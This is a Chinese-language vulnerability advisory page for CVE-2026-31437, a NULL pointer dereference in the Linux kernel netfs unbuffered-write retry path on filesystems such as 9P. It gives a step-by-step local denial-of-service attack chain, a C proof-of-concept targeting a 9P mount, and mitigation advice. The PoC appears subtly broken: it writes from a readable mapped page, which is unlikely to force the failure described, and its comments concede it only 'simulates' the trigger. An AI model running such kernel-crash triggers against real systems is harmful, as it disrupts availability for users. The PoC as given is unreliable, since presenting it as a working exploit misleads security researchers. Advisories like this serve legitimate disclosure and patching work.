CVE-2026-31437 CVSS 5.5 中危

CVE-2026-31437 Linux kernel netfs空指针引用漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31437

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核netfs子系统中存在空指针解引用漏洞。在`netfs_unbuffered_write()`函数的重试路径中，当写入子请求被标记为需要重试时，代码无条件调用了`stream->prepare_write()`。对于未设置该操作的文件系统（如9P），该指针为NULL。当`get_user_pages()`失败并触发重试时，会导致内核空指针解引用，进而引发系统崩溃，影响可用性。

技术细节

该漏洞位于Linux内核的`fs/netfs/direct_write.c`文件中。当写入子请求因`get_user_pages()`失败（如返回-EFAULT）而被标记为`NETFS_SREQ_NEED_RETRY`时，`netfs_unbuffered_write()`函数会尝试重试操作。问题在于重试路径未检查`stream->prepare_write`函数指针是否为NULL就直接调用。某些文件系统（如9P）未实现`prepare_write`操作，导致该指针为NULL。攻击者需具备本地低权限，通过在受影响文件系统上触发特定的写入失败场景，即可迫使内核访问NULL地址，造成拒绝服务。

攻击链分析

STEP 1

Step 1

攻击者获得目标Linux系统的本地低权限访问权限。

STEP 2

Step 2

攻击者识别或利用未实现prepare_write操作的文件系统（如9P）。

STEP 3

Step 3

攻击者在该文件系统上执行特定的写入操作，故意导致get_user_pages()失败（例如传递无效用户空间地址）。

STEP 4

Step 4

内核进入netfs_unbuffered_write()的重试路径，调用NULL指针stream->prepare_write。

STEP 5

Step 5

触发空指针解引用，导致内核崩溃（Kernel Panic），实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31437: Linux Kernel netfs NULL Pointer Dereference
 * Trigger condition: Write retry on a filesystem (e.g., 9P) without prepare_write.
 */

#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
    int fd;
    const char *file_path = "/mnt/9p_share/vuln_test"; // Target 9P mount point
    void *invalid_buf;

    fd = open(file_path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        return -1;
    }

    // Allocate memory and then unmap it or protect it to trigger EFAULT
    invalid_buf = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (invalid_buf == MAP_FAILED) {
        perror("mmap");
        close(fd);
        return -1;
    }

    // Attempt to write from the buffer. Depending on kernel config and timing,
    // triggering get_user_pages failure might require specific invalid pointer passing.
    // This code simulates the write operation context.
    write(fd, invalid_buf, 4096);

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 修复提交版本 (需检查提交 7a5482f5ce891decbf36f2e6fab1e9fc4a76a684)

防御指南

临时缓解措施

建议立即更新Linux内核以修复此漏洞。如果无法立即升级，应暂时禁用受影响的文件系统（如9P）或限制本地用户对系统的直接访问权限，以防止触发该漏洞导致系统崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表